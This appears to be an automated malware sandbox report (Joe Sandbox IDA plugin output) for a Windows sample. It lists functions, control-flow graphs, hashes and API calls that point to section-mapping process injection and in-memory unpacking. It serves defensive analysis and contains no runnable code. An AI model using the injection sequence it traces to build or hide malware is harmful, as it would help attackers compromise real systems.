                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Section$CreateDuplicateObjectView
                                                                                                                    • String ID: 1
                                                                                                                    • API String ID: 1652636561-2212294583
                                                                                                                    • Opcode ID: fc9ad0c17474763d406ce3553705aad449b4f49c1046925f20dec018cbeb3551
                                                                                                                    • Instruction ID: 7f4d7c4657737381e02ab4131f106e217a3bc84f51a1891dc43a423f49ad99c1
                                                                                                                    • Opcode Fuzzy Hash: fc9ad0c17474763d406ce3553705aad449b4f49c1046925f20dec018cbeb3551
                                                                                                                    • Instruction Fuzzy Hash: 14718D71A00205FFEB209F91CC49FEF7BB8EF85B10F14412AF912BA2E5D6759905CA58
                                                                                                                    Function 00401529 Relevance: 10.7, APIs: 7, Instructions: 208nativeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 219 401529-401532 220 401543 219->220 221 401539-40153f 219->221 220->221 222 401546-40157f call 4011a4 220->222 221->222 232 401581 222->232 233 401584-401589 222->233 232->233 235 4018a6-4018ae 233->235 236 40158f-4015a0 233->236 235->233 239 4018a4-4018b3 236->239 240 4015a6-4015cf 236->240 242 4018c8 239->242 243 4018b9-4018c4 239->243 240->239 248 4015d5-4015ec NtDuplicateObject 240->248 242->243 245 4018cb-4018ff call 4011a4 242->245 243->245 248->239 250 4015f2-401616 NtCreateSection 248->250 252 401672-401698 NtCreateSection 250->252 253 401618-401639 NtMapViewOfSection 250->253 252->239 257 40169e-4016a2 252->257 253->252 255 40163b-401657 NtMapViewOfSection 253->255 255->252 258 401659-40166f 255->258 257->239 260 4016a8-4016c9 NtMapViewOfSection 257->260 258->252 260->239 262 4016cf-4016eb NtMapViewOfSection 260->262 262->239 263 4016f1 call 4016f6 262->263
                                                                                                                    APIs
                                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1546783058-0
                                                                                                                    • Opcode ID: 9208168e61d895202d66972dbe02163783dcb6df2364333cde88f6d05e7d9971
                                                                                                                    • Instruction ID: 138ec7ca1e8744eb65f40bd9736a53a73cefe8eecd72c79945fcbf62a21b6401
                                                                                                                    • Opcode Fuzzy Hash: 9208168e61d895202d66972dbe02163783dcb6df2364333cde88f6d05e7d9971
                                                                                                                    • Instruction Fuzzy Hash: D9616E71900205FBEB209F95DC49FEB7BB8FF81B00F14412AFA12BA1E4D6749A05DB65
                                                                                                                    Function 00401534 Relevance: 10.7, APIs: 7, Instructions: 177nativeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 267 401534-40157f call 4011a4 278 401581 267->278 279 401584-401589 267->279 278->279 281 4018a6-4018ae 279->281 282 40158f-4015a0 279->282 281->279 285 4018a4-4018b3 282->285 286 4015a6-4015cf 282->286 288 4018c8 285->288 289 4018b9-4018c4 285->289 286->285 294 4015d5-4015ec NtDuplicateObject 286->294 288->289 291 4018cb-4018ff call 4011a4 288->291 289->291 294->285 296 4015f2-401616 NtCreateSection 294->296 298 401672-401698 NtCreateSection 296->298 299 401618-401639 NtMapViewOfSection 296->299 298->285 303 40169e-4016a2 298->303 299->298 301 40163b-401657 NtMapViewOfSection 299->301 301->298 304 401659-40166f 301->304 303->285 306 4016a8-4016c9 NtMapViewOfSection 303->306 304->298 306->285 308 4016cf-4016eb NtMapViewOfSection 306->308 308->285 309 4016f1 call 4016f6 308->309
                                                                                                                    APIs
                                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1546783058-0
                                                                                                                    • Opcode ID: bf712b81fe7c33e45fb91e121ae8a1411471c4f54e6f2b27f252d32f249b509c
                                                                                                                    • Instruction ID: 46ca3ae5353e1b2bf85c7e7487c0bf4a09c0837efea8bedcf4105f5ea6450319
                                                                                                                    • Opcode Fuzzy Hash: bf712b81fe7c33e45fb91e121ae8a1411471c4f54e6f2b27f252d32f249b509c
                                                                                                                    • Instruction Fuzzy Hash: 81512971900245BFEF209F91CC48FEB7BB8EF85B00F14416AF912BA1A5D6749945CB24
                                                                                                                    Function 00401541 Relevance: 10.7, APIs: 7, Instructions: 175nativeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 313 401541-401543 315 401546-40157f call 4011a4 313->315 316 401539-40153f 313->316 326 401581 315->326 327 401584-401589 315->327 316->315 326->327 329 4018a6-4018ae 327->329 330 40158f-4015a0 327->330 329->327 333 4018a4-4018b3 330->333 334 4015a6-4015cf 330->334 336 4018c8 333->336 337 4018b9-4018c4 333->337 334->333 342 4015d5-4015ec NtDuplicateObject 334->342 336->337 339 4018cb-4018ff call 4011a4 336->339 337->339 342->333 344 4015f2-401616 NtCreateSection 342->344 346 401672-401698 NtCreateSection 344->346 347 401618-401639 NtMapViewOfSection 344->347 346->333 351 40169e-4016a2 346->351 347->346 349 40163b-401657 NtMapViewOfSection 347->349 349->346 352 401659-40166f 349->352 351->333 354 4016a8-4016c9 NtMapViewOfSection 351->354 352->346 354->333 356 4016cf-4016eb NtMapViewOfSection 354->356 356->333 357 4016f1 call 4016f6 356->357
                                                                                                                    APIs
                                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1546783058-0
                                                                                                                    • Opcode ID: fdd984ed4eabfdf3fe245d48b6addcc777c2a155290e4dc39758af1e8cc42314
                                                                                                                    • Instruction ID: 68c08b8250816e380b35483fe5a52fcf5a4ffa7bf922b91d474b11e8be87ed95
                                                                                                                    • Opcode Fuzzy Hash: fdd984ed4eabfdf3fe245d48b6addcc777c2a155290e4dc39758af1e8cc42314
                                                                                                                    • Instruction Fuzzy Hash: 99512AB1900205BFEF209F95CC48FEB7BB8EF85B10F14412AFA12BA1E5D6749945CB24
                                                                                                                    Function 00401545 Relevance: 10.7, APIs: 7, Instructions: 171nativeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 361 401545-40157f call 4011a4 369 401581 361->369 370 401584-401589 361->370 369->370 372 4018a6-4018ae 370->372 373 40158f-4015a0 370->373 372->370 376 4018a4-4018b3 373->376 377 4015a6-4015cf 373->377 379 4018c8 376->379 380 4018b9-4018c4 376->380 377->376 385 4015d5-4015ec NtDuplicateObject 377->385 379->380 382 4018cb-4018ff call 4011a4 379->382 380->382 385->376 387 4015f2-401616 NtCreateSection 385->387 389 401672-401698 NtCreateSection 387->389 390 401618-401639 NtMapViewOfSection 387->390 389->376 394 40169e-4016a2 389->394 390->389 392 40163b-401657 NtMapViewOfSection 390->392 392->389 395 401659-40166f 392->395 394->376 397 4016a8-4016c9 NtMapViewOfSection 394->397 395->389 397->376 399 4016cf-4016eb NtMapViewOfSection 397->399 399->376 400 4016f1 call 4016f6 399->400
                                                                                                                    APIs
                                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1546783058-0
                                                                                                                    • Opcode ID: 9036e7d1caaa2f73f8ffe8f81ed6686f8338ecb8473fc941f507ff01140d436f
                                                                                                                    • Instruction ID: b5c9534ba5f5358dff2a074a80b826bd55324152c05987841a878028393b6fdb
                                                                                                                    • Opcode Fuzzy Hash: 9036e7d1caaa2f73f8ffe8f81ed6686f8338ecb8473fc941f507ff01140d436f
                                                                                                                    • Instruction Fuzzy Hash: 94513AB1900245BFEF209F95CC48FEF7BB8EF85B00F14415AF911BA2A5D6749945CB24
                                                                                                                    Function 00401553 Relevance: 10.7, APIs: 7, Instructions: 166nativeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 404 401553-40157f call 4011a4 411 401581 404->411 412 401584-401589 404->412 411->412 414 4018a6-4018ae 412->414 415 40158f-4015a0 412->415 414->412 418 4018a4-4018b3 415->418 419 4015a6-4015cf 415->419 421 4018c8 418->421 422 4018b9-4018c4 418->422 419->418 427 4015d5-4015ec NtDuplicateObject 419->427 421->422 424 4018cb-4018ff call 4011a4 421->424 422->424 427->418 429 4015f2-401616 NtCreateSection 427->429 431 401672-401698 NtCreateSection 429->431 432 401618-401639 NtMapViewOfSection 429->432 431->418 436 40169e-4016a2 431->436 432->431 434 40163b-401657 NtMapViewOfSection 432->434 434->431 437 401659-40166f 434->437 436->418 439 4016a8-4016c9 NtMapViewOfSection 436->439 437->431 439->418 441 4016cf-4016eb NtMapViewOfSection 439->441 441->418 442 4016f1 call 4016f6 441->442
                                                                                                                    APIs
                                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1546783058-0
                                                                                                                    • Opcode ID: 7e7aa486a7cba38a24c4655809e077ce32b0d632fdebb8ad14eb01bbdf3cd026
                                                                                                                    • Instruction ID: 8d6641cc39e0a23de402a6cd7af9a8bcce9404ceaedab19c941a5a8b34b5f284
                                                                                                                    • Opcode Fuzzy Hash: 7e7aa486a7cba38a24c4655809e077ce32b0d632fdebb8ad14eb01bbdf3cd026
                                                                                                                    • Instruction Fuzzy Hash: 8C5119B1900205BFEF209F95CC48FEFBBB8EF85B00F14411AFA11AA2A5D6759945CB24
                                                                                                                    Function 00402FFA Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 447 402ffa-40301e 448 403024-40303c 447->448 449 40313d-403142 447->449 448->449 450 403042-403053 448->450 451 403055-40305e 450->451 452 403063-403071 451->452 452->452 453 403073-40307a 452->453 454 40309c-4030a3 453->454 455 40307c-40309b 453->455 456 4030c5-4030c8 454->456 457 4030a5-4030c4 454->457 455->454 458 4030d1 456->458 459 4030ca-4030cd 456->459 457->456 458->451 461 4030d3-4030d8 458->461 459->458 460 4030cf 459->460 460->461 461->449 462 4030da-4030dd 461->462 462->449 463 4030df-40313a RtlCreateUserThread NtTerminateProcess 462->463 463->449
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateProcessTerminateThreadUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1921587553-0
                                                                                                                    • Opcode ID: be8e4cb5e493dd895ba0f666486257db29135dc3ef83a78b0b3b9a47898ca96e
                                                                                                                    • Instruction ID: 67905ead67b615cb9fd2ac39997d468ff33d28dd355ca5d175fe45067cf906e9
                                                                                                                    • Opcode Fuzzy Hash: be8e4cb5e493dd895ba0f666486257db29135dc3ef83a78b0b3b9a47898ca96e
                                                                                                                    • Instruction Fuzzy Hash: 8B414732618E0C4FD778EE6CA88966377D5E798351B1643AAD809D3389EE30D85183C5
                                                                                                                    Function 006804BF Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 464 6804bf-6804d8 465 6804da-6804dc 464->465 466 6804de 465->466 467 6804e3-6804ef CreateToolhelp32Snapshot 465->467 466->467 468 6804ff-68050c Module32First 467->468 469 6804f1-6804f7 467->469 470 68050e-68050f call 68017e 468->470 471 680515-68051d 468->471 469->468 476 6804f9-6804fd 469->476 474 680514 470->474 474->471 476->465 476->468
                                                                                                                    APIs
                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006804E7
                                                                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 00680507
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1583256735.000000000067D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0067D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_67d000_RmbF3635xY.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3833638111-0
                                                                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                    • Instruction ID: 0a94162f8ea40fd4552f0e6d09cce9a9bb0cee5f61274add8b36c88ff7ed7e41
                                                                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                    • Instruction Fuzzy Hash: 7BF06232140714ABE7603AF5A88DAAE76EDAF49725F100A28E742921C0DAB0E8494B61
                                                                                                                    Function 005E003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 134 5e003c-5e0047 135 5e004c-5e0263 call 5e0a3f call 5e0e0f call 5e0d90 VirtualAlloc 134->135 136 5e0049 134->136 151 5e028b-5e0292 135->151 152 5e0265-5e0289 call 5e0a69 135->152 136->135 154 5e02a1-5e02b0 151->154 156 5e02ce-5e03c2 VirtualProtect call 5e0cce call 5e0ce7 152->156 154->156 157 5e02b2-5e02cc 154->157 163 5e03d1-5e03e0 156->163 157->154 164 5e0439-5e04b8 VirtualFree 163->164 165 5e03e2-5e0437 call 5e0ce7 163->165 167 5e04be-5e04cd 164->167 168 5e05f4-5e05fe 164->168 165->163 170 5e04d3-5e04dd 167->170 171 5e077f-5e0789 168->171 172 5e0604-5e060d 168->172 170->168 174 5e04e3-5e0505 170->174 175 5e078b-5e07a3 171->175 176 5e07a6-5e07b0 171->176 172->171 177 5e0613-5e0637 172->177 186 5e0517-5e0520 174->186 187 5e0507-5e0515 174->187 175->176 178 5e086e-5e08be LoadLibraryA 176->178 179 5e07b6-5e07cb 176->179 180 5e063e-5e0648 177->180 185 5e08c7-5e08f9 178->185 183 5e07d2-5e07d5 179->183 180->171 181 5e064e-5e065a 180->181 181->171 184 5e0660-5e066a 181->184 188 5e07d7-5e07e0 183->188 189 5e0824-5e0833 183->189 192 5e067a-5e0689 184->192 194 5e08fb-5e0901 185->194 195 5e0902-5e091d 185->195 196 5e0526-5e0547 186->196 187->196 190 5e07e4-5e0822 188->190 191 5e07e2 188->191 193 5e0839-5e083c 189->193 190->183 191->189 198 5e068f-5e06b2 192->198 199 5e0750-5e077a 192->199 193->178 200 5e083e-5e0847 193->200 194->195 197 5e054d-5e0550 196->197 201 5e0556-5e056b 197->201 202 5e05e0-5e05ef 197->202 203 5e06ef-5e06fc 198->203 204 5e06b4-5e06ed 198->204 199->180 205 5e084b-5e086c 200->205 206 5e0849 200->206 208 5e056f-5e057a 201->208 209 5e056d 201->209 202->170 210 5e06fe-5e0748 203->210 211 5e074b 203->211 204->203 205->193 206->178 212 5e057c-5e0599 208->212 213 5e059b-5e05bb 208->213 209->202 210->211 211->192 218 5e05bd-5e05db 212->218 213->218 218->197
                                                                                                                    APIs
                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005E024D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582993231.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_5e0000_RmbF3635xY.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocVirtual
                                                                                                                    • String ID: cess$kernel32.dll
                                                                                                                    • API String ID: 4275171209-1230238691
                                                                                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                    • Instruction ID: 8d9f06940a44e2be45beeee2e4bbecad622b7844b54902dca0b4f5182f6b35db
                                                                                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                    • Instruction Fuzzy Hash: A9526874A00269DFDB64CF59C984BA8BBB1BF09304F1480D9E94DAB391DB70AE85DF14
                                                                                                                    Function 00418770 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63librarymemoryloaderCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 446 418770-4188b0 GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00513D70), ref: 0041884F
                                                                                                                    • GetProcAddress.KERNEL32(00000000,0041E298), ref: 0041888C
                                                                                                                    • VirtualProtect.KERNELBASE(00513BB4,00513D6C,00000040,?), ref: 004188AB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582631929.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40b000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2099061454-3916222277
                                                                                                                    • Opcode ID: ff9a43801e185d10054e4e34767694ffcb7e86b2b941098a4c4c71e4807009e3
                                                                                                                    • Instruction ID: 2b977b853b8716191c274d39b2deee1532fc6552ce3022b0d9a41b083186e0cb
                                                                                                                    • Opcode Fuzzy Hash: ff9a43801e185d10054e4e34767694ffcb7e86b2b941098a4c4c71e4807009e3
                                                                                                                    • Instruction Fuzzy Hash: D8316F18508780CAE301DB79FC257823F6AAB75744F04D0ACD54C8B3B1D7BA5618E36E
                                                                                                                    Function 005E0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 477 5e0e0f-5e0e24 SetErrorMode * 2 478 5e0e2b-5e0e2c 477->478 479 5e0e26 477->479 479->478
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNELBASE(00000400,?,?,005E0223,?,?), ref: 005E0E19
                                                                                                                    • SetErrorMode.KERNELBASE(00000000,?,?,005E0223,?,?), ref: 005E0E1E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582993231.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_5e0000_RmbF3635xY.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2340568224-0
                                                                                                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                    • Instruction ID: cea14cca2211f37e0d6e011ac58af5d885f71300399aca2e74a7d4b784c7d1e3
                                                                                                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                    • Instruction Fuzzy Hash: 0FD0123114512877D7002A95DC09BCD7F1CDF05B62F008421FB0DD9080C7B0994046E5
                                                                                                                    Function 0040190E Relevance: 1.3, APIs: 1, Instructions: 66sleepCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 498 40190e-40190f 499 401912-401963 call 4011a4 Sleep call 401426 498->499 500 4018b5-4018ff call 4011a4 498->500 523 401972-401978 499->523 524 401965-40196d call 401529 499->524 527 40198e 523->527 528 40197f-40198a 523->528 524->523 527->528 529 401991-4019bd call 4011a4 527->529 528->529
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4152845823-0
                                                                                                                    • Opcode ID: 2faec9f74094ce0f08c74674007c6dc18df4c3c5133ab61c0808bb95c55d4a7d
                                                                                                                    • Instruction ID: c3efed824753038ef125f202698f45fd900918c8f6410fb3a7b527937a7c5fc5
                                                                                                                    • Opcode Fuzzy Hash: 2faec9f74094ce0f08c74674007c6dc18df4c3c5133ab61c0808bb95c55d4a7d
                                                                                                                    • Instruction Fuzzy Hash: D811BFB220C204EBEB00AA908C52EAA3754AF05710F248137BA42791F1C57D9A13F75B
                                                                                                                    Function 0068017E Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 537 68017e-6801b8 call 680491 540 6801ba-6801ed VirtualAlloc call 68020b 537->540 541 680206 537->541 543 6801f2-680204 540->543 541->541 543->541
                                                                                                                    APIs
                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006801CF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1583256735.000000000067D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0067D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_67d000_RmbF3635xY.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4275171209-0
                                                                                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                    • Instruction ID: 681223a5f44de88a19816fad90bdcaa4198014a3f9805301805da2ff7cfe14f3
                                                                                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                    • Instruction Fuzzy Hash: 08113C79A00208EFDB41DF98C999E99BFF5AF08350F0580A4F9489B362D371EA50DF80
                                                                                                                    Function 00401902 Relevance: 1.3, APIs: 1, Instructions: 47sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
